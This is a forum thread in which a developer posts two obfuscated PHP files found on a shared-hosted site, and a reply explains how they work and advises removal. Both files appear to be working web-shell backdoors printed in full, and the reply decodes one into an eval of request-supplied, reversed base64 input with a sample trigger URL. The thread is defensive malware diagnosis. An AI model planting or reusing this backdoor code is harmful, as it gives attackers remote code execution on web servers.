I found several strange files in the public_html
directory of a sight I'm working on. I call them strange because:
wolakfie.php
,txvepdhxy.php
, etc.Now, I'm not the first developer to work on this site, so they could in theory, have done something in the past. Here is an example of the contents of one of the files:
<?php
$immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
$closing = 'e'; $knell ='epI$';
$delays ='R';$authors ='t';
$immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
$censor = '@';
$asparagus= 'T""';
$graying= 'leopua';
$casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
$madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';
$indolently = '(';$interconnection= 'd';
$indefinite= 'n'; $georgina='veno';
$deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';
$colly= 'S';$corundum = '=i"PEosLE';
$icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
$decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';
$indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
$courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';
$creature='K';
$blindfold = 'sa_T';
$dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
$hunter= '$)4]';
$derision =';';$excoriate = 't';$auditor= '?';
$gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .
$dune.$checkbook[3]. $gecko['2'] . $excoriate.
$checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
$georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .
$gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
$birchen['0']. $gecko['1'].
$icebergs.$badger['3'] .
$georgina['2'] .
$jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .
$auditor ,
$excoriate.$foursome['1'].
$gecko['2'] .$dune.$decoded['5']. $checkbook[6] .
$gecko['1'] .$hunter['1'].
$hunter['1'] . $hunter['1'] .
$derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,
$fineness,
$baths['5'] ,$checkbook['4'], $cocksure['4'] ,
$brooks['7'] ,
$checkbook['4'].
$brooks['5'].$corundum['0'] .
$gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .
$checkbook[3].$gecko['1'].
$checkbook['4'] . $foursome['1']. $canteen .$imagen.
$brooks[1].$influences.
$imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .
$canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.
$checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
$checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
$foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
$indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .
$inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .
$equipoise['0'] .
$gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
$foursome['3'] . $badger[0].
$grasp.$grasp .
$birchen['1'] .
$foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].
$badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
$brooks['5'].
$indignation.$foursome['3'] .
$badger[0] .$grasp .$grasp .
$birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .
$dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .
$derision .$checkbook[3].
$deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .
$brooks['7'].
$gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .
$brooks['0'] .
$checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].
$checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
$checkbook[3] . $deviate.
$gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].
$hunter['1'].
$hunter['1'] .
$hunter['1'] .$derision );
No obvious base64_encode
or eval
, but the strangeness and apparent irrelevance of the code has me raise my eyebrows a little. I will probably just delete them, but I wondered first if anyone could offer any insight. The site is on a shared Linux server hosted by GoDaddy.
UPDATE: I found another one that looks like it has some eval
:
<?php $oypsfe=chr(99).chr(114)."e"."\x61"."\x74"."\x65"."\x5f".chr(102).chr(117)."\x6e"."c"."\x74"."i"."\x6f"."n";$rfktbj = $oypsfe('$a',strrev(';)a$(lave')); $rfktbj(strrev(';))"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"(edoced_46esab(lave'));?>
The upshot of my question is:
They contain seemingly useless code - not obviously malicious, but certainly suspicious.
Relevant bits from the first code:
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sooolphg"])?$i["sooolphg"]:(isset($i["HTTP_SOOOLPHG"])?
$i["HTTP_SOOOLPHG"] : die);
eval(strrev(base64_decode(strrev($a))));
It can pass in pretty much any payload via request parameters or URL query strings. So anyone making a request like filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere
can gain access by having the payload eval
ed. The parameter shellAccessEasilyHere
is a command string - reversed, then base64-ed, then finally reversed again. Something like ==QZjh2bgICSlxGbvByVvJHbkJyO
would echo "Hello World".
You can see the code from the other script here (I'm not posting it here for obvious reasons): ideone.com/sUCJee
You'll be safe once you remove all the infected files. Make sure that the infection didn't get inside your own files.
Good thing that you pulled the uninfected (make sure it really is so) version from git.